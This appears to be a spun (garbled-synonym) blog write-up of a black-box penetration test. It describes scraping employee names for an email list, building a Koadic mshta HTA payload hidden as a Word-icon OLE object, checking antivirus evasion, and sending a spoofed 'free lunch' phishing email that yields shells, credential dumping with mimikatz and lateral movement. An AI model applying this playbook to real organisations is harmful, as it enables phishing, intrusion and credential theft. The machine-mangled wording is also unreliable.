The goal was straightforward – perceive how helpless the association is from an outer perspective and test the adequacy of the security controls that are overseen undertaking wide. All things considered, asides, the organization name, we were given “ZERO” information to play out an outside discovery entrance Testing.
This discovery outside entrance Testing Performing with a by a customer called (Hackme)
We commenced with some Open Source Intelligence (OSINT) 101 :). There are a lot of open source knowledge apparatuses – to help with get-together messages, subdomains, has, representative names, and so on from various open sources like web search tools and shodan. There is a comprehensive rundown of such wonderful instruments here .
Utilizing many open source knowledge instruments, we got freely accessible records identifying with the association utilizing Black-box Penetration Testing techniques.
With Google nitwit to the salvage, we ran some fundamental pursuit strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” .
Likewise Read: Network Penetration Testing Checklist
Obviously, our point was not to eagerly look for records. Or maybe, our goal was to comprehend the association’s naming pattern by looking at the metadata of the archives which is found in the “properties segment” of the record (most particularly Microsoft Word, PowerPoint, and Excel). One can likewise utilize FOCA for this.
From this, I saw that representatives messages followed a specific naming show – the principal letter of the firstname + family name @ domain.com for example [email protected].
Furnished with this information, we forked out from LinkedIn the rundown of every single current worker of Hackme utilizing the accompanying google dimwit grammar:
site:linkedin.com – inurl:dir “at Hackme” “Current”. A normal model is appeared beneath utilizing Google Inc as a source of perspective organization.
By hacking a content to computerize the procedure, we replicated out the principal names, last names and the jobs of the current workers of Hackme.
A tiring methodology is to physically creep through the google pages in scan for these names and job or one could likewise utilize GoogleScraper:
GoogleScraper – m http – catchphrase “site:linkedin.com – inurl:dir ‘at Hackme’ ‘Current'” – num-pages-for-watchword 3 – yield filename output.json
Result: Black-box Penetration Testing
Once more, I leave the conceivable outcomes to your creative mind – however you can without much of a stretch believer this to a .csv document utilizing https://json-csv.com/or whatever other converter that works for you.
at that point utilizing your preferred word processor (word consolidate, notepad++, and so forth) or some great scriptful abilities, combine the firstname + lastname – to frame your email list.
Feed our Target list a Payload
Since we are mimicking a Black-box Penetration Testing, we chose (simply like what an assailant would never really) code execution utilizing pernicious payloads. All things considered, we thought of making a payload and sending it by means of messages to representatives of Hackme.
We additionally realize that it is a typical practice for some document type/expansions to be obstructed by the association’s email channels – to restrict introduction to hazard.
This at that point carries us to utilizing Koadic C3 COM Command and Control, a better than average structure simply like your Meterpreter or Empire.
What made it truly stand apart asides the delightful interface is that it permits one to dump hashes, download/transfer documents, execute orders, sidestep UAC, examine neighborhood organize for open SMB, turn to another machine, load mimikatz and much more.
So we ran Koadic and set the vital factors – utilizing the “stager/js/mshta ” module (serves payloads in memory utilizing MSHTA.exe HTML Applications).
The outcome was a generate of our HTA payload URL as prove in the screen capture above. Be that as it may, we need our objectives to execute our payload as “mshta payload_url”.
Lately, HTA payloads have been utilized as a web assault vector and furthermore, to drop malware on a casualty’s PC. Presently we have to get this payload past our casualty’s various resistances.
Here comes the dubious part – we required an approach to have the casualty run “mshta payload_url” without our payload being brought forth as a kid procedure of mshta.exe – as we presume this present association’s blue group may hail this.
Fortunately, we saw the tip on the left from Matt Nelson and curiously, the group at NCC bunch have this executed in Demiguise.
So here is our last payload spared as a .hta record.
The subsequent stage ordinarily is to send our .hta payload as an inserted OLE object.
The expected assault situation was:
Send a Microsoft word report with our .hta payload installed as an OLE object.
Get the client to open the word report and the installed OLE object.
This produces another procedure and we get a shell access into our casualty’s PC.
Presently we get to the intriguing part, we need our casualty to open the Microsoft word archive and our payload.
To do this, we need a convincing story – on the grounds that clients are getting more astute. So we made a beeline for accomplishing more recon.
… and more recon
We have to find out about Hackme – explicitly the way of life and representatives conduct. The inquiry we remained quiet about posing was “what might intrigue the workers?”
What other place to get this data than Glassdoor , a stage that gives you inside scoop on organizations with worker surveys about pay rates, advantages, upsides and downsides of working with the organization.
In the wake of poring through surveys of Hackme on Glassdoor, we discovered some normal subjects:
… and more recon
We have to find out about the objective association’s condition – explicitly workers. The inquiry we hushed up about posing – what might intrigue the representatives?
What other place to get this data than Glassdoor, a stage that gives you inside scoop on organizations with representative audits about pay rates, advantages, upsides and downsides of working with the organization.
In the wake of poring through audits of the objective association on Glassdoor, we discovered some basic subjects:
A few representatives felt versatility was a test as the workplace is a significant distance from private areas.
Workers love the association since they get free lunch.
Like the well-known axiom goes, the quickest path to a man’s heart is through his stomach. So what better approach to get the representatives to open our payload installed word record?
Send them an email – letting them know there is an adjustment in the FREE LUNCH menu beginning from tomorrow.
As opposed to send an arbitrary phishing email to representatives that could be spotted effectively, we chose an apparently veritable email would be perfect finished with Hackme email signature while watching the association email culture.
Presently, how would we make our email more trustworthy? By sending an email to Customer administration/Help Desk with an assistance demand and watching the email signature in the reaction.
… recon once more???
We went to Linkedin, to search for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is fitting) of Hackme. We deliberately created an email signature with the name we chose.
We are part of the way through sending our payload now. Have some persistence and perused on…
It’s an ideal opportunity to send our payload
From the metadata recon done before, we could determine what our objective association’s archive headers and footers resembled.
I at that point made another word archive like the one appeared underneath with a parting picture of Hackme report layout with fitting headers/footers.
At that point we implanted our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the symbol to Microsoft Word’s symbol and furthermore the subtitle to mirror our message.
Change the symbol to Microsoft Word’s symbol and furthermore, change the subtitle to mirror your message.
Remember the Anti-infection!!!
To check the AV identification pace of our payload – and to check whether it will be hailed as malignant by Hackme antivirus arrangement (assuming any), we did a fast AV filter on nodistribute.com. Nodistribute.com was utilized in light of the fact that as per them, they don’t disperse payload tests to AV organizations. We filtered both the maldoc and the .hta record also.
AV Scan of our .hta payload (0 discoveries)
It’s Time to Send our Email
On the off chance that the objective organization doesn’t have SPF, DKIM and DMARC arranged, one can without much of a stretch farce the HR Manager, Logistic Manager or Admin Manager’s email address.
For this situation, I made a Gmail account (truly, Gmail works as well) utilizing the Logistic Manager’s first name and last name – and afterward spiced it up with his mark which was gotten before.
Give the shells access
Soon after sending the email, inside a time of around 3 minutes, we had at any rate 30 shell associations! W00t!!!
The rest they regularly state is history. From here-on, utilizing the mimikatz modules, we heightened benefits, dumped hashes, filtered the neighborhood system of Hackme, rotated into different PCs, perused the objective’s document frameworks and even became area administrators and so forth.
Taking everything into account
All things considered, this was an exceptionally fun commitment. While it might take an aggressor a month/2months/a time of devotion to break into an association – through an escape clause at the framework level. It tends to be genuinely simple for one to obtain entrance by abusing the human factor.
“When you comprehend your objective condition, concocting an inventive methods in accessing the earth turns out to be genuinely simple”.
The lesson of the activity is: Recon, recon and more recon – for an insightful man once said
“Allow me six hours to slash down a tree and I will spend the initial four honing the hatchet”.
You can tail us on Linkedin, Twitter, Facebook for day by day Cybersecurity refreshes.